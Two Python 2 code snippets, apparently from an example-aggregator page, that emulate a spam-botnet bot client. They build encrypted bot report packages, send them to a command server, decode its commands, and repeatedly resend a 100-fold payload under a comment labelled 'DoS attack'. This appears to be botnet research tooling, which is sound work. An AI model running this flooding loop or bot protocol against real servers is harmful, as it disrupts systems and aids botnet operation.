Beispiel #1
0
def generate_package(bid=0, bulkstate=1, dbg=False):
    # Generate bulk_info array
    bulk_info_array = ""
    for i in range(0, 2):
        bulk_info = init_bulk_info(i, bulkstate)
        bulk_info_array += buffer(bulk_info)[:]

    # Generate botbulk_info
    botbulk_info = init_botbulk_info(1, i+1)

    # Generate bot_rheader
    size = 20 + 8 * botbulk_info.logsize
    bot_rheader = init_bot_rheader(bid, size)

    # Construct data package
    data = buffer(bot_rheader)[:] \
            + pencrypt(buffer(botbulk_info)[:] + bulk_info_array, bot_rheader.size)

    # Print package content
    if dbg:
        cprint("BOT_RHEADER\n", "yellow"); print hexdump(buffer(bot_rheader)[:])
        cprint("BOTBULK_INFO\n", "yellow"); print hexdump(buffer(botbulk_info)[:])
        cprint("BULK_INFO\n", "yellow"); print hexdump(buffer(bulk_info_array)[:])
        cprint("Data Package\n", "yellow"); print hexdump(data)

    return data
Beispiel #2
0
def main():
    # Socket configurations
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.settimeout(3.0) # Set 3s timeout

    # Connect
    s.connect((HOST, PORT))

    cprint("\n[*] Sending data to " + HOST + " : " + str(PORT) \
            + " (hexdump below)\n", "green")

    # Initialise bot_info, bot_rheader, botbulk_info structures
    bot_info = BOT_INFO()
    bot_rheader = BOT_RHEADER()
    botbulk_info = BOTBULK_INFO()

    # Populate bot_rheader structure
    bot_rheader.bid     = 0
    bot_rheader.iplocal = 2886783745 # Should be INT
    bot_rheader.botver  = 116
    bot_rheader.confver = 1
    bot_rheader.mfver   = 1
    bot_rheader.winver  = 1
    bot_rheader.flags   = 1
    bot_rheader.smtp    = 1
    bot_rheader.size    = 32

    # Conversion: Structure -> Bytes (Str)
    #bot_info.bufrecv = buffer(bot_rheader)[:] # Same as pack()
    bufrecv = buffer(bot_rheader)[:]
    bufrecv_enc = pencrypt(bufrecv, len(bufrecv)) # Try encrypting

    # Populate bot_info structure
    bot_info.ip                 = "\254\020\323\001" # char[4]
    #bot_info.have_ip            = 1
    bot_info.bufrecv            = bufrecv_enc
    bot_info.bufsize            = 32
    bot_info.bid                = 0
    
    """
    bot_info.bufsend            = ""
    bot_info.bufdata            = ""
    bot_info.bufsmall           = 10000

    bot_info.id                 = 0
    bot_info.sd                 = 5
    bot_info.timer              = 2
    bot_info.state              = 2
    bot_info.blackliststatus    = 0
    bot_info.bshcommand         = 0

    bot_info.flags              = 0

    bot_info.botbulk            = pointer(botbulk_info)

    # Statistics
    bot_info.bsent              = 0
    bot_info.bnouser            = 0
    bot_info.bunlucky           = 0
    bot_info.bunksmtpansw       = 0
    bot_info.bblacklisted       = 0
    bot_info.bmailfrombad       = 0
    bot_info.bgraylisted        = 0
    bot_info.bnomx              = 0
    bot_info.bnomxip            = 0
    bot_info.bnoaliveip         = 0
    bot_info.bsmtptimeout       = 0
    bot_info.bconnect           = 0
    bot_info.brecv              = 0
    bot_info.bbotmailtimeout    = 0
    bot_info.bspammessage       = 0
    bot_info.bnohostname        = 0
    bot_info.blckmx             = 0

    bot_info.captcha_good       = 0
    bot_info.captcha_total      = 0

    refbulk = (c_byte * 4)()
    bot_info.refbulk            = cast(refbulk, POINTER(c_int))
    bot_info.refbulk_size       = 0
    """

    # Send
    print hexdump(buffer(bot_info)[:])
    s.sendall(buffer(bot_info)[:] * 100)
    cprint("[+] Sent! Now waiting to receive data...\n", "green")

    # Initialise recv buffer
    buf = ""

    # Listen on host
    while True:

        try:
            # Try receiving data
            rcvmsg = s.recv(1024)

            # Check whether connection is closed
	    if rcvmsg == "":
	        break
	
            # Got some data!
            sys.stdout.write("[+] Received: ")

            # Interpret command
            cmd = ord(rcvmsg[0])

            if   cmd == RC_SLEEP:
                cprint("RC_SLEEP",      "cyan")
            elif cmd == RC_GETWORK:
                cprint("RC_GETWORK",    "cyan")
            elif cmd == RC_RESTART:
                cprint("RC_RESTART",    "cyan")
            elif cmd == RC_UPDATE:
                cprint("RC_UPDATE",     "cyan")
            elif cmd == RC_BID:
                cprint("RC_BID",        "cyan")
            elif cmd == RC_TEMPLATE:
                cprint("RC_TEMPLATE",   "cyan")
            elif cmd == RC_CONFIG:
                cprint("RC_CONFIG",     "cyan")
            elif cmd == RC_MAILFROM:
                cprint("RC_MAILFROM",   "cyan")
            elif cmd == RC_ACCOUNTS:
                cprint("RC_ACCOUNTS",   "cyan")

	    print hexdump(rcvmsg)

            # Store data in buffer (for later use)
            buf += rcvmsg

        except socket.timeout:

            # Timed out on receiving data: 
            # Let's check out the contents of recv buffer (if not empty)
            if buf:
                # Decrypt recv buffer
                dec = pdecrypt(buf, len(buf))
                print "[+] Decrypted:\n", dec, "\n"

                # Clear recv buffer
                buf = ""
                cprint("[*] Listening for incoming data (press Ctrl+C to quit)\n" \
                        , "green")
            
            # DoS attack
            s.sendall(buffer(bot_info)[:] * 100)
            
    # Close socket
    s.close()